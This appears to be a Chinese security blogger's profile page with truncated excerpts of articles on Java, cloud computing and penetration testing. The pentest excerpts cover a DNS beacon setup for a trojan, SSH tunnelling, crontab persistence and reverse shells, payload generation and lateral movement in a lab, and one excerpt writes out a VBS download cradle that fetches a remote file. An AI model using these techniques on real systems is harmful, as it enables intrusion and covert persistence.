
简介
该用户还未填写简介
擅长的技术栈
可提供的服务
暂无可提供的服务
文章目录前言1. 基础语法2. 构造函数前言java是一个解释型的语言,可跨平台执行。一个 Java 程序可以认为是一系列对象的集合,而这些对象通过调用彼此的方法来协同工作,每个java文件都是一个类,同一文件夹下可以互相调用其他文件下的类,不同文件夹下可以通过import命令进行导入。java中没有析构函数,finalize是用来回收内存的。1. 基础语法大小写敏感:Java 是大小写敏感的。类
dns beacon创建listener假设我的二级域名为 test.com。设置域名的A记录例如 bk.test.com,值为自己的工网ip。再设置几个ns记录,例如game.test.com,ns记录的值写成bk.test.com。dns host(stager)设置vps的a记录的域名在dns hosts 设置ns记录。原理木马运行后受害者主机会查询我们指定的DNS Host中的域名的A记录
1. 政务云电子政务云是为政府部门搭建一个底层的基础架构平台,把传统的政务应用迁移到平台上,去共享给各个政府部门,提高它的服务效率和服务的能力。考虑到电子政务系统在安全方面的特殊要求,电子政务云更适合选择私有云。公共服务云定位为由政府主导,整合公共资源,为公民和企业的直接需求提供云服务的创新型服务平台。根据公共服务的行业又可对公共服务云进行细分,如医疗云、社保云、园区云等。公共服务云需要整合各种公
ssh端口转发一些命令参数-C 压缩数据传输-f 后台登录用户名密码-N 不执行shell[与-g 合用] -g 允许打开的端口让远程主机访问在一台公网 VPS 上编辑 sshd 配置,开启 ssh 转发功能,重启 ssh 服务,这是所有使用 ssh 隧道转发前的必备操作:vim /etc/ssh/sshd_configAllowTcpForwarding yesGatewayPorts yesT
文章目录1.前言2.前置知识3.测试3.1 使用crontab来设置计划任务3.2 直接编辑文件设置计划任务4.总结5.参考文章1.前言在linux渗透测试的时候,有时会选择使用计划任务crontab来进行权限维持或者反弹shell,在自己做测试的时候遇见了几个特殊的点做一下记录。2.前置知识各个用户的计划任务文件存在/var/spool/cron/crontabs/中,以用户名来命名。系统级别的
CATALOG1.常见高级参数2.常用生成载荷命令2.1 生成linux系统反向shell载荷2.2 生成windows系统载荷2.3 生成web类型载荷2.4 生成语言类载荷1.常见高级参数参数字段效果set PrependMigrate true启用迁移进程(默认为:false)set PrependMigrateProc explorer.exe迁移到此进程名:explorer.exeset
CATALOG前言环境配置第一步:配置vmware的vmnet8的dhcp第二步:下载csk靶机第三步:打开靶机开始攻击第一步:扫描第二步:利用漏洞获得shell第三步:提权提权操作过程:第四步:进一步信息收集获取第二台主机.30的权限前言这边篇文章主要在于学习linux横向渗透,csk是一个靶机环境,具体参考Linux 横向移动实验。环境配置第一步:配置vmware的vmnet8的dhcpsud
前言分为几个部分来记录一下linux应急响应的一些操作与思路。主机相关1.利用自动化检测程序rookithunter进行检测rookithunter可以自动化检查主机上可能存在的rookit木马文件,与被篡改的命令等,找到被篡改的命令后可以选择删除命令,然后重新安装命令。参考:后门和漏洞在Linux中使用“Rootkit Hunterrootkit后门检查工具RKHunter第一步:下载与安装ro
Vbsecho Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbsecho Set Shell = CreateObject("Wscript.Shell") >>download.vbsecho Post.Open "GET","https://raw.githubusercontent.com/shanfen
文章目录1. 什么是javassist2. 什么是ClassPool3. 什么是CtClass4. 写一个Class文件test.class5. 修改这个写好了的test.class7. 加载类并获取类中的私有变量6. 参考文章1. 什么是javassistjavassist是一个处理Java字节码的jar包,里面有很多类。2. 什么是ClassPool可以想象成一个容器,里面放着指定路径下的cl